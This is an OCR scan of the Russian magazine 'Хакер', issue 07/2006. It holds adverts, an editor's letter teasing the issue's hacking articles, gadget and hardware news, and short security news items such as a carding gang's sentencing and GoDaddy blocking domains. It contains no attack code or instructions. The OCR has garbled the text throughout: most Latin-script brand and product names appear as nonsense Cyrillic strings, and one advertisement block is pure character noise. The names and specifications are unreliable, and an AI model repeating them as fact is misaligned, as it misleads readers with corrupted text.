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ГЕНЕРАЛЬНЫЙ 
СПОНСОР 



"ФУТБОЛЬНЫЙ МЕНЕДЖЕР"! 

СОЗДАЙ СВОЮ КОМАНДУ ИЗ РЕАЛЬНЫХ ИГРОКОВ И ПРИВЕДИ ЕЕ К ПОБЕДЕ 
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Плат сП ігігтіт пгі - ити Іиімі ЫдПіаП гв Ч Е М И М О НО В 2 ПНЯ /О? 

Футбольный менеджер посвященный Чемпионату миро 2006 
Призы от компании асПбоа Подробности на асігсіаз ЛоГаІ-ГооіЬаІнГд 




Я знаю, что многие начинают читать жур- 
нал с конца. В этом месяце такое не про- 
катит. Начать тебе обязательно нужно с 
рубрики «Взлом»: теперь ей руководит 
РогЬ, и он уже умудрился сделать ее в три 
раза интересней. Статьи о взломе едино- 
го госэкзамена, западле с телевизорами 
и надругательством над интернет-казино 
— на его совести. 

После этого ты уже можешь открыть ста- 
тью о том, как мы паяли девайс для унич- 
тожения винчестеров: были достигнуты, 
кстати, потрясающие результаты. 

Затем рекомендую тебе взять с нашего 
мегатонного 0\Ю бета-версию Висты и за- 
тестить свежачок от МісгозоЙ. 

И только проделав все это, ты получишь 
право открыть 144 страницу, приятель. 

Ни в коем случае не делай этого раньше! 



пікііог, гл. ред. Ха 
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НАРЮ МЕѴѴ5 — СЕРГЕЙ НИКИТИН 

Х-ЫЕѴѴЗ — МІЫОѴѴОВК 

НІ-ТЕСН ЫЕѴѴЗ — ЮРИЙ СВИДИНЕНКО 





Универсальный проектор ЕР80Ы 

Новый проектор компании Ерзоп представляет собой устройство для 
выполнения самых разных задач. Он создан на основе передовой ЗІ_СО 
и обеспечивает качественное, яркое и четкое изображение. Проектор 
обладает яркостью в 1800 люмен, а его контрастность составляет 500: 1 . В 
проекторе ЕМР-34 реализована слайд-крышка объектива и функция быс- 
трого включения/выключения — подготовка к работе займет 4 секунды. 
Благодаря технологии Е-ТОРБ проектор может работать в хорошо осве- 
щенной комнате, не теряя качества картинки (диагональю 60 дюймов), 
которую он может создать с расстояния 1,8м. Закрывая слайд-крышку, 
человек одновременно приостанавливает показ картинки и звучание 
музыки, что дает докладчикам новые возможности при ведении конферен- 
ций. Стоит добавить, что уровень шума сосотавляет 30 дБ, а его вес 2,6 кг. 
Не забудь про русифицированное меню! 
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ѴегЬаІіт представляет диски Міпі 
ОѴР+В ОІ_ 

Продолжают развиваться оптические диски. 
Растет скорость работы с ними и объемы 
информации, которые они могут вместить. 
Компания ѴегЬаІіт обещает нам диски Міпі 
ОѴО+Р ОБ, которые имеют 8 сантиметров в 
диаметре, а объем — 2,6 Гб (около часа видео). 
Бояться не стоит: они полностью отвечают 
стандарту ОѴО+Р 0 \_, который утвержден 
ОѴО+РѴѴАІІіапсе, и совместимы с любыми на- 
копителями, поддерживающими этот формат. 
Чтобы твои гигабайты данных не повредились, 
на поверхность диска нанесен специальный 
защитный слой ЗсгаІсЬ Оиагб, который, по 
словам производителя, делает диски в 40 раз 
более устойчивыми к повреждениям. Стоит 
добавить, что эти болванки появятся в продаже 
в начале лета, вместе с видеокамерами, кото- 
рые могут с ними работать. 



ТВ ПО-НОВОМУ 



Компания Сотрго выпустила ТѴ-тюнер, не похожий на 
большинство устройств такого плана. Во-первых, он не 
подключается к компьютеру, а устанавливается на пути 
между системным блоком и монитором. Естественно, 
он отлично выполняет свою главную функцию: прокру- 
чивает телевизионные программы на мониторе твоего 
ПК. За качество картинки отвечает фирменный чип, 
который, кстати, поддерживает разрешение 1600x1200, 
разные соотношения сторон (4:3, 16:9и 16:10), 
работает с разными типами мониторов и имеет разъем 
8-Ѵісіео. Среди возможностей устройства присутствует 
и функция наложения изображения, то есть картинка в 
картинке: часть твоего рабочего стола может стать теле- 
визором, а другая — остается свободной для пасьянса. 
Стоит добавить, что в комплект входит и пульт дистан- 
ционного управления. С таким устройством можно не 
только ТВ смотреть, но и друзей удивлять. 
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Пришло время купить компьютер 
на базе двухъядерного процессора 
нового поколения |Ше1 й Репііит® □ 
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Когда мощности одного 
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нужно принимать і^ардинальные меры! 
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И СНОВА ѴѴАІ_КМАЫ 




Компания 8опу вновь порадовала своих поклонников выпуском 
новых моделей плееров ѴѴаІктап. Сегодня изменения коснулись 
линейки Е: новые модели называются МѴѴ-Е002, МѴѴ-Е002Е, НѴѴ- 
Е003, КЛД2-ЕООЗ и МѴѴ-Е005 . Их главная особенность — система 
быстрой зарядки, которая дает плееру возможность работать более 
суток, проигрывая музыку в форматах АТВАСЗ , ѴѴМА и МРЗ . 
Кстати, емкость новых плееров составляет от 5 12 Мб до 1 Гб, а в 
комплект поставки входит ПО 8опіс8га§е для удобного управления 
музыкой и загрузки треков. Если вдруг тебе надоест загруженная 
музыка, то спасением станет встроенный радиотюнер. Корпус вы- 
полнен из поликарбоната и имеет шесть вариантов расцветки. 8опу 
также планирует выпустить массу аксессуаров к данному устройству. 



Репііит М влезает в десктопы 

Очередную системную плату для настольного ПК, которая может 
работать с процессором Репііит М (Зоске1479), нам представила ком- 
пания АОреп. На этот раз это бюджетное решение. Устройство АОреп 
3661 РХт-РЗІЧ имеет два слота ЭІММ для памяти ЭЭРІ400 (до 2 Гб), порт 
АОР 8Х и три РСІ, а также встроенный графический адаптер ЗіЗ 661 РХ. 
На плате установлен встроенный 6-канальный звуковой контроллер 
АІ_С655. Кроме того, новинка содержит 4 разъема ІЮМА, два коннек- 
тора ЗАТА (поддерживается РАЮ 0 и 1 ). Кроме 115В, есть возможность 
подключать РігеѴѴіге-устройства. Завершает картину сетевой контрол- 
лер. Кстати, плата имеет форм-фактор МісгоАТХ, поэтому, учитывая 
низкое тепловыделение ЦП Репііит М, на ней можно собрать неболь- 
шой, недорогой и тихий ПК. 



Системная плата 
на будущее 

Хотя процессоры под сокет АІѴЮ 
М2 пока редкость, волна систем- 
ных плат, которые их поддержи- 
вают, продолжает нарастать. Се- 
годня компания Рохсопп заявила 
о том, что ее новинка — плата 
С51 ХЕМ2АА — может работать с 
АІѴЮ5оскеІАМ2. Мать построе- 
на на чипсете ІМѴЮІА пРогсе 590 
5Ц который дает ей возмож- 
ность работать с двухканальной 
памятью ЭЭРІ2-800. Имеется 2 
порта РСІ-ЕхІб, один — РСІ-Е 
х4, 1 РСІ-Е хі и два обычных 
РСІ. Кроме того, установлено 6 
коннектеров интерфейса ЗАТА 
2, поддерживающего РАЮ. 
Также стоит отметить звуковой 
РЮА-адаптер и два встроенных 
гигабитных сетевых контролле- 
ра. Энтузиасты наверняка оце- 
нят кнопки питания и сброса на 
плате, систему идентификации 
ошибок, состоящую из динами- 
ка и двух светоидов. Так что 
ждем новых процессоров! 





Хромированная ѴІА 

Компания ѴІА выпустила новый чип- 
сет со встроенным графическим 
ядром СИготеЭ, готовый к работе с 
будущей операционной системой 
ѴѴіпсІоѵѵз Ѵізіа. Новый чипсет под- 
держивает новейшие процессоры 
Іпіеі Соге Эио, память ЭЭРІ2 667 
и шину РСІ Ехргезз. Встроенный 
СРІІ СИготеЭ является ЮігесІХ 
9-совместимым, 
шейдеры версии 2.0, 
ты (с разрешением до 1920x1080) ■ 
и фирменную технологию ѴІА 
СИготоІіоп, которая позволяет 
улучшить качество изображения. 
Шина Ѵ-Ііпк сможет связать этот 
чипсете любым южным мостом 
ѴІА, например, с ѴІА ѴТ8251 , 
обладающим встроенным кодеком 
ѴІА ѴіпуІ (8 каналов, РЮ-звук, 
32-бит/1 92 кГ ц). Так что у произво- 
дителей появится возможность по 
созданию весьма разнообразных 
и интересных системных плат на 
основе новинок от ѴІА. Итак, новый 
этап чипсетного противостояния 
пѴібіаи ѴІА открыт! 



ВНОИ НАБОР 



ЮОІТЕСН 



Новая гарнитура компании Ео§кесЕ называется РС НеасЬеТ 120 
и отлично подходит для звонков с компьютера на компьютер, 
голосового общения в сети, крика на товарищей по оружию в се- 
тевых играх, а также, естественно, может работать как обычные 
наушники. Гарнитура имеет удобное оголовье, так что, надев, 
ты тут же о ней и забудешь - никаких неудобств . Полоса пропус- 
кания самой гарнитуры — 20-20000 Гц, микрофона — 100 — 
10000 кГц. Длина кабеля — 2 м. Если ты по-прежнему считаешь 
такое устройство ненужным, то знай, что популярность передачи 
голоса в Сети постоянно растет. Например, программу 8куре по 
всему миру скачали уже 250 миллионов человек. 



006 



ХАКЕР 07 /91/ 06 





и^шнин гуііргщі ииайиіі Н-**іГ-РМаЛшй* фШяИУЭДй НЙДй Соа^к Ш ОмСПИі ШМчіІЬМ 
С1р^ннТ*Г1Ы<| .1 Яйчий^в^Р[^1^р1в0ЬШЙ ^^[цМСИ^щ-^и й^в пі 

і МІп*йі ГВДЫМнк* Йгі^мшн ѴП і# 1 ПМО-лМіІь иИЙ-ІІй не(*'чр= І.ни^ ,* Нфн-ййѵвд 

іЛг * -ИІГІ ::й йбьіР «■ Ч Аі ющ- рч-К вин релщг ы.. і*вц ; лртсррі ■ -с и ^рлСп л *м М«п*чрНгІ 
і^Ііаі'Ч 44*1 иу^рн-- м *«І и Р Д№Л*нр« ^ны* «ОііМЭДЙ. -И Лг* *ВД№-ёД -1 І^ніи^м 

аггафо-у^мр-п 4 ГЕРйрчга^ч гі-рш -онк— *> -срлныв ггш- н П- Щи'-чГ лй^мтчфгчмв 

-!-| Л,И^ ІНМЕ. І н Еы:^Н_ и ":і/«:іЫ Ч**» СМ*рИ ^ и«ЩЪ &ірЦГ4Іи В і' ' I* ^ ■ ■ ІГ4С ■ ^ ѵ гВДдеШ 

■Тйичмн&т ЕКідМіЦ р I іоАЙО ^ лті *■ >Д1Мс И Ар. ^ Ьтч-Й 



.ѵ.ѵ.-. пікгл іи 

ТЁй*фен ГОрч^йА Л№ИН. 014*5! 73Э-9І7С. 

сооиріх 

Р 4 




І№«1 



*і I у“ініп" :м ГЛІСн* 1 




Робот — ящерица 

Зачем нужен механический геккон? Сказать 
трудно, однако давай воспринимать факты 
такими, какие они есть. Марк Каткоски и его 
команда из Стэнфорда построили ЗііскуВоІ: 

— опытный образец робота-альпиниста, ко- 
торый карабкается по стенам на четырех «су- 
хих» липких ногах. ЗііскуВоІ должен двигаться 
по вертикальным плоскостям за счет «сухого 
прилипания», причем управляемого. Гекконы 
используют нановолоски для путешествий 
по вертикальным препятствиям. Нанотрубки, 
которые с успехом их заменяют, разрабатыва- 
ются уже давно. Однако о том, чтобы снабдить 
такими липкими ногами не то что человека, а 
робота, пока не было и речи. Лапы у робота- 
геккона сделаны из синтетических щетинок 
— эластомеров, а не нанотрубок. Каждый из 
этих волосков «прикрепляется» к стене меж- 
молекулярной силой, известной как сила ван 
дер Ваальса. ЗііскуВо* пока двигается очень 
медленно и срывается, но исследователи 
надеются, что роботы такого типа в будущем 
смогут служить в качестве планетарных рове- 
ров и/или спасательных ботов. 




МОДЕЛЬКИ ИЗ АТОМОВ 



Моделирование наноструктур — задача сложная, требующая специального программно- 
го обеспечения. Но несмотря на это, ученые продолжают разрабатывать и моделировать 
разные молекулярные запчасти. Так, недавно ученые из компании ИапоКЕХ смогли 
на программном комплексе папоЕИСШЕЕК-І создать модель универсального шар- 
нира, спроектированного Эриком Дрекслером и Ральфом Меркле еще в 1992-м году. 
Исследователям удалось показать динамику работы шарнира, и с помощью результатов 
моделирования было установлено, что оба шарнирных плеча могут изгибаться до 20° от- 
носительно друг друга. При этом части шарнира не имеют точек трения! Они изгибаются 
на химических связях, держащих две части механизма. По результатам исследований была 
составлена анимация работы шарнира, в котором он изгибается до 40°. Частота изгиба- 
ний шарнира — 100 Гц. Состоит девайс из 3846 атомов, его длина — 6,4 нанометров, 
ширина и высота — 3,8 нм. Эта модель — одна из попыток создать машину без трущихся 
частей вообще. Ученые теперь планируют смоделировать этот механизм в составе уже из- 
вестного тебе молекулярного автомобиля для приведения в движение нескольких колес 
от центрального лопастного двигателя. Что же будет дальше, если автомобилям прицепят 
еще и небольшой компьютер? 







Механическая рука, читающая мысли 

Помнишь детскую игру камень-ножницы-бумага? Так вот, 
теперь с роботами в нее играть нельзя: прочитав твои 
мысли, они уже знают, что ты выбросишь в следующий мо- 
мент. Сделать это было непросто. Основа системы считы- 
вания мыслей — функциональный магниторезонансный 
сканер активности мозговой деятельности (ШВІ) в реаль- 
ном времени. Этот фантастический девайс соединен с до- 
вольно гибким механическим протезом руки. Ну, конечно, 
это покруче, чем управлять курсором мыши на экране с 
помощью мысли. Представь себе: по токам крови внутри 
сосудов головного мозга 1МПІ строит картину мозговой 
активности и, исходя из ряда шаблонных карт, приказы- 
вает руке принять соответствующее положене. Подумал 
сделать рукой о'кей — и вот механические пальцы сами 
сложились в знакомую загогулину. Удивительно, правда? 
Больше всего это изобретение пригодится инвалидам, 
для которых, собственно, и разрабатывалось. 



Американская компания ІпІегЬаіНі занимается системами для душа с пристав- 
кой І_ихигу уже, наверное, лет тридцать. И вот наконец-то решила выпустить 
светящийся электронный душ (ЕІесйопіс І_ідНі ЗНоѵѵег — ЕІ_5). Кроме электро- 
ники, душевая лейка (да простят мне такое грубое обращение!) оформлена 
настоящими кристаллами Зѵѵагоѵзкі. Если не смотреть на кристаллы, то ЕІ_3 
больше всего похож на лампу в операционной. Система действует так: по ва- 
шему выбору струйки воды либо непрерывно меняют цвета, либо освещают и 
омывают вас любимым цветом. Для выбора есть зеленый, желтый и голубой. А 
красного, увы, нет. Это связано с тем, что после частого применения красного 
душа будут шалить нервишки :). Но для того, чтобы увидеть, как светится это 
чудо, нужно выключить свет в душевой кабине. Свет идет к воде по оптоволо- 
конному кабелю из коробочки, где установлены галогенные лампы и крутяще- 
еся колесо с разноцветными линзами. Принцип простой, но почему-то никто 
не додумался его использовать именно в душе. В головке душа имеется 270 
дырочек. И к каждому отверстию свет подведен отдельным волокном диамет- 
ром около 1 миллиметра. Стало быть, с одной стороны, к головке Е1_3 подходит 
кабель со светом, а с другой — вода, по вполне обычному шлангу. «Лечите 
нервы в лучах воды», — советует ІпіегЬаіН. 
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гго- русски. 



е^?,.іІьеІ!А-оп||ін!,ги 



ЕѵегС^иеьс II, культом я игра. завоевавшая миллионы по клешни коп по всему миру, 
заговорила на твоем родном языке. Теперь у тебя есть возможность по- настоящему погрузиться 
в огромны й сказочный мир, полный опасностей и приключений! 

' Подробности на сайте сц2,акеІІа-отІІіпо.ги РеномендаьАННДД иена 549 рублей 










ЧАСИКИ ДЛЯ ЯХТСМЕНОВ 

Наручные часы. . . Казалось бы, вещь простая и доступная. Но при желании даже из 
наручных часов можно сделать такой девайс, что даже непонятно, зачем он такой нужен. 
Так, двое мировых светил в области часового мастерства — Жан-Францис Рюшонне 
и Вианни Хальтер, — скооперировавшись, сделали непростые наручные часы. Этот 
девайс, внешне смахивающий на кассовый аппарат, выпущен ограниченным тиражом 
— всего-то 135 штук. И цена у них соответствующая — от $220 тысяч. Назвали детище 
СаЬезТап — лебедка с барабаном, насаженным на вертикальный вал, для подтягивания 
речных судов у причалов, выбирания судовых якорей и тому подобного. И правда, часы 
внешне напоминают две лебедки, соединенные между собой рядом передач. Рюшонне 
говорит, что при создании СаЪезТап вдохновлялся морской тематикой. Отсюда и якорная 
цепь на лебедке и некоторое сходство хронометра с навигационным прибором. Часики 
действительно морские — в них можно даже нырять под воду на глубину до 30 метров. 

Но и это не последнее слово таб-часовщиков. Жан-Францис задумал трилогию: концепт 
Мопасо Ѵ4 воплощал собой землю и автомобиль, «Кабестан» — море и корабли, а третий 
хронометр, находящийся в разработке, будет посвящен воздуху и авиации. 




Дисплеи: от 20 к 30 

Может быть, что вскором времени в моби- 
лах, и не только в них, появятся трехмер- 
ные дисплеи. Затзипд ЗйІ представила 
успешную разработку новой технологии, 
позволяющей воспроизводить объемные 
изображения на дисплеях практически лю- 
бых устройств. Основа технологии хитрых 
корейцев — плоские панели с активной мат- 
рицей на органических І_ЕСах (асііѵе таігіх 
огдапіс ІідИі-етіИіпд біосіе — АМОЬЕО), что 
неудивительно, поскольку Затзипд являет- 
ся лидером в области построения І_ЕЭ-дисп- 
леев. Общественные организации предста- 
вили в рамках анонса 4,3" АМ01_Е0-дисплей, 
который обеспечивает наибольшую 
скорость работы и наилучшее разрешение 
объемного изображения по сравнению с 
уже существующими 30-дисплеями. Но на 
достигнутом Затзипд не останавливается. 

В настоящее время компания продолжает 
работу над технологией, чтобы сделать 
возможным ее использование не только в 
мобилах, но еще в ноутбуках и телевизо- 
рах. По прогнозам Затзипд, в ближайшие 
лет десять большинство дисплеев будут 
поддерживать функции воспроизведения 
объемного изображения, а к 201 0-му году 
спрос на 30-дисплеи возрастет вдвое. 



Первый робот-полиморф 

Тебе, наверное, и так понятно, зачем нужен много- 
функциональный блочный робот. О них много писали 
и даже демотстрировали прототипы. Но теперь можно 
со всей уверенностью сказать, что первый робот- 
полиморф создан. Это сказал адъюнкт-профессор 
Вэй Минь Шэнь из университета Южной Калифорнии 
(ІІЗС). Назвали машину довольно скромно — ЗирегВоТ 
Бюджет «Супербота» составляет ни много ни мало $8 
миллионов. И деньги эти, в основном, идут от ЫАЗА, 
потому как робот нацелен на освоение космоса. 
Задумывался ЗирегВоі как модульный, многофункци- 
ональный и переконфигурируемый робот. В теории он 
может ползти, как змея или гусеница, превращаться 
в колесо, а также сформировать руку-манипулятор, 
стать ровером, машиной-альпинистом, чтобы спустить- 
ся в кратер, или даже быть мобильной платформой. 
Создать такого гибкого робота позволили автономные, 
интеллектуальные и самопереконфигурируемые моду- 
ли, лежащие в основе всей системы. Отдельно взятый 
модуль, имеющий 2 электромоторчика и компьютерный 
чип, может самостоятельно передвигаться и перево- 
рачиваться. Соединиться друг с другом модули могут в 
четырех местах с различной ориентацией. На закуску 
разработчики намереваются продемонстрировать 
«летательные способности» единственного модуля в 
условиях микрогравитации. 
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тел.: (495) 777-1044 
факс.: (495) 958-6019 
заІе$@сІѵт.ги 



о- 





из ритнои и 7501) 



Во Власти Качества 

Джентльмен из бизнес-класса 

І_С ПАТРОИ и 75011- самый тонкий 17”-й монитор (толщина 35 мм) 

Диагональ - 17” / Время отклика - 8 мс/ Толщина монитора - 35 мм/ Контрастность - 600:1/ Углы обзора - Н: 160°, V: 160°/ 
Поддержка креплений на стол, стену, потолок.- ѴЕ5А/ Соответствие стандартам - ТСО’ОЗ 

ш/ѵѵ.Ід.ги 



Москва(495): Ашан 258-9710, Белый Ветер 730-3075, Бит и Байт 788-004, Дестен Компьютере 970-0007, Дилайн 969-2222, Инкотрейд 673-0275 
И Н ЛАЙН 941-6161 Инфорсер 173-9934, Карин 956-1158, Кибертроника 504-2531, НИКС 974-3333, Неоторг 363-3825, НТ компьютере 917-1930 
Регард-Трейд ЛТД 101-4158, Сетевая лаборатория 500-0305, СтартМастер 967-1515, Техносила 777-8-777, Формоза-Альтаир 234-2165 
Ф-Центр 105-6447, Цифровой мир 785-3888, Эльдорадо 500-0000 АШ 158-6362, Рогит Сотриіегз 775-7559, иМТЕК.ПІІ 939-2432, ОШІ 232-3009 

Роіагіз 970-1930, Ргопеі 789-3846, Зипгізе 542-8070, ТесЖоте.ги 225-8808, ІДТВА Сотриіегз 775-7566, ІІ5М Сотриіегз 775-820; Бийск (3854): "Компьютерград” 
333-232; Барнаул (3852): Оргтехсервис 243-296, Благовещенск (4162): Ксерокс Сервис 41-12-16, Джи-Эс-Ти партнер 53-9280; Екатеринбург (343): 
АСМ Электроника 217-9696, Белый Ветер Екатеринбург 377-6518, Трилайн 378-7070, Диджитек 377-7407; Иркутск (3952): 

Альф Компьютере 25-15-45, Комтек 25-83-38; Казань (8432): Логические системы 11-22-33, МЭЛТ 511-12-12, Таііп.сот 264-41-41; Саратов (8452): 
АТТО 444-111, БИТ 268-40-40; Набережные Челны (8552): Элекам 35-8910; Нижневартовск (3466): Ланкорд 61-22-22, Нижний Новгород (8312): 
Домашний компьютер 166-000, Коіа ОізІгіЬиІіоп 34-1015, ІІ8Т 30-1674, Ай-Ти-Он 63-01-53; Новосибирск (383): Мега 334-04-40, ТехноСити 332-4163 
Левел 212-0005; Норильск (3919): Солнечный 463756; Омск (3812): “Лаборатория систем 321" 24-54-12, Бизнес Техника 23-33-7 7, Домотехника 58-7777 
Оренбург (3532): КС-Центр 77-47-11; Пермь (342): 21-24646 Инстартехнолоджи; Ростов-на-Дону (8632): Сотриіег-Сііу 290-4590, ТД Иманго 237-0686 
Поиск-компьютер 250-1300; Краснодар (861): Поиск-компьютер 253-3878; Ставрополь (8652): Поиск-Компьютер 77-22-23, Телемир 566-777 
Томск (3822): Стек 554-554; Уфа (3472): Форте ВД 37-9606; Челябинск (3512): Рембыттехника 72-56-01 




МІСР080РТ ДЕЛИТСЯ 
СЕКРЕТАМИ С ХАКЕРАМИ 

Можешь ли ты представить ситуацию, когда дяди из МісгозоЙ сами прихо- 
дят к хакерам и рассказывают о тонкостях защиты винды? Мне как-то слабо 
представляется. А вот сами дяди из Місгозоіт ничего зазорного в этом не видят, 
поэтому решили принять участие в хакерской конференции Віаск Нау которая 
состоится уже скоро. Причем не просто поучаствовать, а прочитать несколь- 
ко докладов о методах защиты грядущей Висты, разных функциональных 
особенностях и тому подобных вещах. Всего за один день спецы из МісгозоЙ 
планируют сделать 5 презентаций, одна другой откровеннее. Так что злохаке- 
ры, попавшие на Віаск Нау смогут узнать о защитных механизмах новой ОС 
задолго до ее выхода и заранее разработать свои злотехники взлома. «Каков 
мотив столь странного поведения?» — спросишь ты. По словам представителей 
Місго80Й, такой шаг вызван политикой компании, которую можно изложить в 
двух словах: «Наша система безопаснее всех!». И реальную степень этой самой 
безопасности они предлагают определить независимым специалистам, то есть 
хакерам. 




Квантовые дисплеи — «старая» новинка 

Как тебе известно, плоские и даже гибкие дисплеи — уже 
не новинка на мировом рынке электронной техники. Но 
современные 1_С0- и 01_Е0-дисплеи не могут обеспечить 
достаточной яркости и контрастности. Ате, которые могут, 
стоят довольно дорого. В связи с этим различные компании 
ведут поиски новых продуктов, способных при относи- 
тельно низкой стоимости предложить потребителю гибкий 
дисплей с высокой контрастностью и быстродействием. 

И при этом была «реанимирована» технология дисплеев 
на квантовых точках. Квантовые точки — это специальные 
нанокристаллы, ведущие себя как один отдельный атом. 
Первый прототип-дисплей от американской компании 00 
Ѵізіоп'з — всего лишь монохромная полоска размерами 
32x64 пикселя. Но, несмотря на малые размеры прототи- 
па, Ко-Салливан, представитель компании, уверяет, что 
через несколько месяцев будет сконструирован прототип 
«квантового дисплея», не уступающий по разрешению сов- 
ременным ЕЮТѴ. Кроме высокой яркости и контрастности 
(изображение на дисплее можно видеть даже при ярком 
солнечном свете), устройство будет потреблять меньше 
энергии, чем современные аналогичные ЦЮ-телевизоры. 
Также новый дисплей можно изгибать практически в любом 
направлении. Также дисплей на квантовых точках может 
покрывать гораздо больше цветов из видимой области 
спектра, чем любой 01_Е0 или 1_С0. Как говорит Салливан, 
количество цветов, отображаемых СЮ-1_Е0 дисплеем 
может быть на 30% больше, чем в современных СПТ-дис- 
плеях. Снижение энергопотребления достигается за счет 
того, что нерабочие пиксели не потребляют энергию, в 
то время как в 1_С0-дисплеях задняя подсветка работает 
все время, несмотря на то, сколько пикселей в настоящее 
время заблокировано. Для производства одного фотона 
в СЮ-1_Е0 тратится всего 50 электронов, что немного для 
светоизлучающего устройства. Поэтому дисплеям на кван- 
товых точках также не потребуется задней подсветки, без 
которой 1_С0-дисплей невозможно сконструировать. 




Операция Мозар 

В прошлом месяце в Великобритании прошла антитеррористическая 
операция «Мозар», в результате которой были арестованы 30 человек. 
Началось все с того, что британские спецслужбы установили электрон- 
ное наблюдение за несколькими людьми, подозревавшимися в связях 
с террористами. Полиция перехватила сетевую переписку и блокиро- 
вала каналы, по которым она шла. Из полученной инфы стало ясно, что 
чуваки задумали недоброе, а именно: взорвать здание парламента в 
Оттаве. Всплывшее имя Абу Мусаба аль-Заркави, лидера подпольной 
террористической группы в Ираке, стало тому подтверждением. Спец- 
службы арестовали сначала 1 7 человек, участвовавших в переписке, а 
через них вышли на остальных. Большинство задержанных оказались 
людьми, завербованными террористами через интернет. Борода- 
тые слуги Аллаха уже давно используют передовые технологии для 
пополнения своей армии. Так что если тебе в мыло попадет письмо от 
какого-нибудь Моххамеда бин Ладена, то лучше его сразу удали — от 
греха подальше. 
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ПОД КОЛПАКОМ У АНБ 

Не секрет, что Агентство национальной безопасности США 
владеет большой базой данных американски жителей и не только. 
Телефоны, адреса, номера социального страхования, судимости 
и даже особые приметы. Но АНБ этого показалось мало, и парни 
решили расширить свою сокровищницу. А как это лучше всего 
сделать? Правильно, обратиться к интернету. Ведь народ в сети 
на каждом углу оставляет о себе разные полезные сведения. Чего 
стоят только сайты знакомств и веб -блоги. Конечно, если вручную 
фильтровать все это добро — никакого здоровья не хватит, поэто- 
му сейчас Агентство занимается разработкой технологии быстрого 
сбора данных по заданным критериям. Мораль сей басни такова: 
смотри, что пишешь, — Большой Брат не дремлет. 



Доменный беспредел 

Сложная ситуация возникла вокруг российского хостинг-провайде- 
ра Маргсіото и крупнейшего американского регистратора доменов 
СоЭасІсІу. В середине июня годэдди блокировала домены клиентов 
мажордомо, мотивируя это жалобами на спам с этих адресов. Автором 
недовольства была компания ЗратИоизе, занимающаяся ведением 
черного списка спамерских адресов. Получив письмо от спамхауза, 
деддики долго разбираться не стали, а просто отключили домены. 
Марго! о іті о это, конечно, не понравилось, тем более что никаких доказа- 
тельств рассылки спама от них нет. Имена «плохих» клиентов, которые 
назвал регистратор, по словам хостера, к нему отношения не имеют 
- один еще в прошлом году прервал сотрудничество, другой - вообще 
является сторонней компанией. Получается, что (ЗоЭасІсІу, не проверив 
инфу, ввела такие кардинальные меры. Итогом переписки между двумя 
организациями стало предложение от регистратора заплатить по $1 99 
за восстановление каждого отключенного домена или по $55 за пере- 
ход к другому регистратору. Конечно, Маргбото может подать в суд, 
но есть мнение, что от этого не выиграет никто: СоЭасІсІу- буржуйская 
контора и является чем-то вроде Майкрософта в своем деле. Чем все 
закончится, не известно, а пока блокированные домены имеют длинную 
приставку: 31)ЗРЕІ\ЮЕЭ-РОВ.5РАМ-АІ\Ю-АВІІЗЕ.СОМ. 



Три года за карикатуру Христа 

Веб-блоги за последние несколько лет стали не просто одним из интер- 
нет-комьюнити, а настоящей сетевой болезнью, которой заражены мил- 
лионы людей. Каждый теперь считает себя просто обязанным поделиться 
своими мыслями и наблюдениями с остальными, причем мысли эти 
могут быть о чем угодно. Но если в нашей стране каждый может в своих 
дневниках безнаказанно обсирать правительство или, к примеру, звезд 
эстрады, то жителям Сингапура теперь приходится следить за своим 
языком. Недавно там арестовали автора одного из блогов, который выло- 
жил у себя карикатуру Иисуса Христа в виде зомби и подписал: «Почему 
мой Мессия пытается съесть мой мозг? На третий день Иисус восстал из 
могилы» . Соцнадзор шутку не оценил и сначала попросил убрать прово- 
кацию по-хорошему, а когда сингапурский графоман не повиновался, 
выслал ему повестку в суд. Причем штрафом за хулиганство чувак может 
и не отделаться — максимальное наказание составит 3 года тюрьмы. Это, 
кстати, не первый подобный случай: в прошлом году в этой стране поса- 
дили за решетку двух китайцев, сетевые писульки которых разгневали 
сингапурских мусульман. Причем так, что азиаты сидят и по сей день. Что 
бы подумала сингапурская полиция нравов про авторов кружка « Весе- 
лый богохульник»: ИДр://соттипі1ѵ.ІіѵеіоигпаІ.сот/ги ЫазрИетѵ 



Кардерский приговор 

В кардерском мире есть люди, которые 
воруют помаленьку, и не привлекают к себе 
особого внимания, а есть такие, что гребут 
лопатами, и рано или поздно оказываются 
в коморке 3x3. Именно ко второй категории 
относится банда одессита Артура Ляшенко, 
которая почти три года терроризировала 
бедных буржуев. Основной их деятельностью 
было производство и сбыт фальшивых креди- 
ток, а добыванием инфы о номерах реальных 
счетов занимались отдельные люди. Любой 
желающий мог купить у них карточку с минимальным количеством 
денежных знаков за 1 00-150$, клиенты посерьезнее брали кредитки с 
многозначными суммами за 40-50%. У кардеров даже был свой сайт, от- 
куда они сбывали основную часть поддельных кред. К поимке Ляшенко 
и Со подключились как МВД, так и спецслужбы (Интерпол, ФБР), ведь 
ущерб от их работы оценивался уже в районе 90 миллионов долла- 
ров. Как их поймали — тема отдельной статьи. Скажу только, что при 
задержании банды на их штаб-квартире нашли более 80-ти тысяч карт 
на миллионы баксов. На днях московский суд вынес парням приговор: 
главаря Ляшенко приговорили к 6-ти годам общего режима, а осталь- 
ным членов группы — от 5 лет условно до 5 лет за решеткой. 
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КИТАИ ПОД 

флагом ишх 



В конце 2005-го года китайское правитель- 
ство объявило, что планирует сократить 
закупаемый софт от МісгозоЙ на четверть. В 
июне этого года китайцы подошли к вопросу 
кардинально. Страна восходящего солнца 
решила полностью отказаться от услуг дяди 
Билла, и все китайские компьютеры оснастить 
ОС І_іпих. По крайней мере, те, которые стоят 
в правительственных и госучреждениях. «Этя 
глябальная тиндесия. Линукся дешевый, сте- 
пень ево адаптасии тожи высокий, однако», 

— прокомментировал решение верхов Майк 
Лин, консультант компании Таіреі Сотриіег 
Аззосіаііоп. А Майкрософт осталось только 
развести руками: «Покупатели вольны сами 
выбирать, что им нужно». Тем не менее, с 
правительством Китая согласны далеко не 
все. Например, крупнейший производитель 
ПК в этой стране, компания І_епоѵо, планирует 
и дальше сотрудничать с МісгозоЙ, устанав- 
ливая винду на все выпущенные компьютеры. 
Эксперты предрекают, что, если І_епоѵо 
будет гнуть свою линию, ее конкуренты ЭеІІ 
и НР отберут часть рынка, а значит, лишат 
компанию прибыли. К тому же неизвестно, как 
к этому отнесется президент Китая вместе с 
министрами, — представители этого народа 
известны своими кардинальными мерами к 
«смутьянам правильного режима». Кстати, на 
русских секурити-форумах наши спецы вовсю 
поддерживают китайцев и выражают сожале- 
ние, что такого поворота пока не произошло 
в России. 




Соо§1е продолжает трудиться на благо на- 
рода, но при этом все равно находятся злые 
люди, которые не ценят усилий компании. 
Мало того, подают на любимца народа в 
